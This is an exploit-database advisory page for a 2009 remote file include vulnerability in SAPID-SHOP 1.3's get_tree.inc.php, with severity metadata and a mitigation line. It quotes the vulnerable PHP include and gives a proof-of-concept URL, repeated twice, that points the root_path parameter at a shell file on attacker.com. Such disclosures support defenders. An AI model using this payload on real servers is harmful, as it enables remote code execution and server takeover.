header-logo
Suggest Exploit
vendor:
SAPID-SHOP-1.3
by:
Gorontalo
9.3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: SAPID-SHOP-1.3
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SAPID-SHOP-1.3 Remote File Include Vulnerability

SAPID-SHOP-1.3 is vulnerable to a remote file include vulnerability. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'root_path' parameter of the 'get_tree.inc.php' script. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it in the context of the webserver process. This can be exploited to gain access to the server.

Mitigation:

Upgrade to the latest version of SAPID-SHOP-1.3 or apply the patch from the vendor.
Source

Exploit-DB raw data:

#Download Script      :  http://sourceforge.net/projects/sapid/files
########################################################################
#
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
#     <?php
#       require $forms_dir."calmenuform.php"; if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
#       include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#      ?>
#
#PoC  :  http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
#
########################################################################
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
#     <?php
#       if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
#       include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#      ?>
#
#PoC  :  http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

   [ Gorontalo / 2009 ]

Navigation

Suggest Exploit

Services By CQR